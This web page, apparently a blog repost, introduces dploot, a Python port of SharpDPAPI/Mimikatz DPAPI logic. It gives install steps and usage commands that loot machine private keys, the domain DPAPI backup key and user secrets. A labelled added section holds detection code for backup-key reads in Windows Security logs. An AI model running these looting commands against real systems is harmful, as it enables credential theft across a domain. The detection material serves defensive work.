dploot

DPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data. In a user scenario, the user's password is typically used to set the 'master key'. So, to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault, etc.), we just need access to a password.

dploot is a Python rewrite of SharpDPAPI, written in C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a Python interpreter and from a Linux environment.

Install: (Pip)

pip install dploot

Install: (Git)

git clone https://github.com/zblurx/dploot.git
cd dploot
make

Usage:

# Loot decrypted machine private key files as a Windows local administrator 
dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet

# Loot the DPAPI backup key as a Windows Domain Administrator (will allow an attacker to loot and decrypt any DPAPI-protected password related to a domain user)
dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet

# Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints
dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk  -quiet 
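
Detection view of the backup-key step above, as an added example that is not part of the original page or of dploot: on a domain controller, a read of the DPAPI backup key appears as Security event 4662 against a `BCKUPKEY` LSA secret, which can be tied to a source address through the 4624 logon that shares its session id. It assumes the audit policy that produces these events is enabled; the records, accounts, session ids and addresses are constructed samples, and `find_backupkey_reads` is a hypothetical helper name.

```python
# Constructed sample: Security-log records from a domain controller, already
# parsed into dicts. All accounts, session ids and addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "Administrator", "TargetLogonId": "0x5E3A1C",
     "LogonType": 3, "IpAddress": "192.0.2.50"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectLogonId": "0x5e3a1c",
     "ObjectType": "SecretObject", "AccessMask": "0x2",
     "ObjectName": "Policy\\Secrets\\G$BCKUPKEY_PREFERRED"},
    {"EventID": 4662, "SubjectUserName": "Administrator", "SubjectLogonId": "0x5e3a1c",
     "ObjectType": "SecretObject", "AccessMask": "0x00000002",
     "ObjectName": "Policy\\Secrets\\G$BCKUPKEY_00000000-0000-0000-0000-000000000000"},
    # Same object type, but not a backup-key secret: must not match.
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3e7",
     "ObjectType": "SecretObject", "AccessMask": "0x2",
     "ObjectName": "Policy\\Secrets\\$MACHINE.ACC"},
    # Directory object access, unrelated to LSA secrets: must not match.
    {"EventID": 4662, "SubjectUserName": "svc_sync", "SubjectLogonId": "0x77aa01",
     "ObjectType": "user", "AccessMask": "0x100",
     "ObjectName": "CN=alice,DC=waza,DC=local"},
]

SECRET_QUERY_VALUE = 0x2  # LSA access right: read the secret's value


def find_backupkey_reads(events):
    """Return one finding per 4662 read of a DPAPI backup-key LSA secret."""
    # Logon session id -> source address, taken from 4624 logon events.
    sources = {e["TargetLogonId"].lower(): e.get("IpAddress", "-")
               for e in events if e.get("EventID") == 4624}
    findings = []
    for e in events:
        if e.get("EventID") != 4662 or e.get("ObjectType") != "SecretObject":
            continue
        if "BCKUPKEY" not in e.get("ObjectName", "").upper():
            continue
        # Test the access bit instead of comparing strings ("0x2" vs "0x00000002").
        if not int(e.get("AccessMask", "0x0"), 16) & SECRET_QUERY_VALUE:
            continue
        session = e.get("SubjectLogonId", "").lower()
        findings.append({"account": e.get("SubjectUserName"),
                         "secret": e["ObjectName"].rsplit("\\", 1)[-1],
                         "source": sources.get(session, "unknown")})
    return findings


if __name__ == "__main__":
    for f in find_backupkey_reads(SAMPLE_EVENTS):
        print(f"ALERT backup-key read: {f}")
```

Because the backup key does not change once obtained, a single match warrants treating every DPAPI-protected domain user secret as exposed, not only the session that triggered the alert.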

 
 
 

© 2035 by Train of Thoughts. Powered and secured by Thiru
